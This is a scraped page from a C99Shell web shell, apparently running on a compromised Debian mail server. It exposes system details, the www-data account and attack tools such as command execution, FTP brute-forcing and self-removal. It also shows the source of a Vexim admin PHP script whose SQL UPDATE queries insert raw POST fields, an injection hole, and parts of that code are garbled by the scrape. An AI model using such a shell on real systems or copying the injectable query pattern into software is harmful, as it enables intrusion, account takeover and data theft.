!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/vexim/   drwxr-xr-x
Free 130.03 GB of 142.11 GB (91.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     adminaliaschangesubmit.php (2.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
  
include_once dirname(__FILE__) . '/config/variables.php';
  include_once 
dirname(__FILE__) . '/config/authpostmaster.php';
  include_once 
dirname(__FILE__) . '/config/functions.php';
  include_once 
dirname(__FILE__) . '/config/httpheaders.php';

  
# Fix the boolean values
  
if (isset($_POST['admin'])) {
    
$_POST['admin'] = 1;
  } else {
    
$_POST['admin'] = 0;
  }
  if (isset(
$_POST['enabled'])) {
    
$_POST['enabled'] = 1;
  } else {
    
$_POST['enabled'] = 0;
  }
  
# Do some checking, to make sure the user is ALLOWED to make these changes
  
$query "SELECT avscan,spamassassin from domains
    WHERE domain_id = 
{$_SESSION['domain_id']}";
  
$result $db->query($query);
  
$row $result->fetchRow();
  if ((isset(
$_POST['on_avscan'])) && ($row['avscan'] == 1)) {
    
$_POST['on_avscan'] = 1;
  } else {
    
$_POST['on_avscan'] = 0;
  }
  if ((isset(
$_POST['on_spamassassin'])) && ($row['spamassassin'] == 1)) {
    
$_POST['on_spamassassin'] = 1;
  } else {
    
$_POST['on_spamassassin'] = 0;
  }

  
# Update the password, if the password was given
  
if (validate_password($_POST['password'], $_POST['vpassword'])) {
    
$cryptedpassword crypt_password($_POST['password']);
    
$query "UPDATE users SET crypt='{$cryptedpassword}',
      WHERE user_id=
{$_POST['user_id']}";
    
$result $db->query($query);
    if (!
DB::isError($result)) {
      if (
$_POST['localpart'] == $_SESSION['localpart']) {
        
$_SESSION['crypt'] = $cryptedpassword;
      }
    } else {
      
header ('Location: adminalias.php?failed');
    }
  } else {
    
header ('Location: adminalias.php?badpass');
  }

  
$aliasto preg_replace("/[', ']+/"","$_POST['target']);
  
$query "UPDATE users SET localpart='{$_POST['localpart']}',
    username='
{$_POST['localpart']}@{$_SESSION['domain']}',
    smtp='
$aliasto',
    pop='
$aliasto',
    realname='
{$_POST['realname']}',
    admin='
{$_POST['admin']}',
    on_avscan='
{$_POST['on_avscan']}',
    on_spamassassin='
{$_POST['on_spamassassin']}',
    enabled='
{$_POST['enabled']}'
    WHERE user_id=
{$_POST['user_id']}";
  
$result $db->query($query);
  if (!
DB::isError($result)) {
    
header ("Location: adminalias.php?updated={$_POST['localpart']}");
  } else {
    
header ("Location: adminalias.php?failupdated={$_POST['localpart']}");
  }
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0086 ]--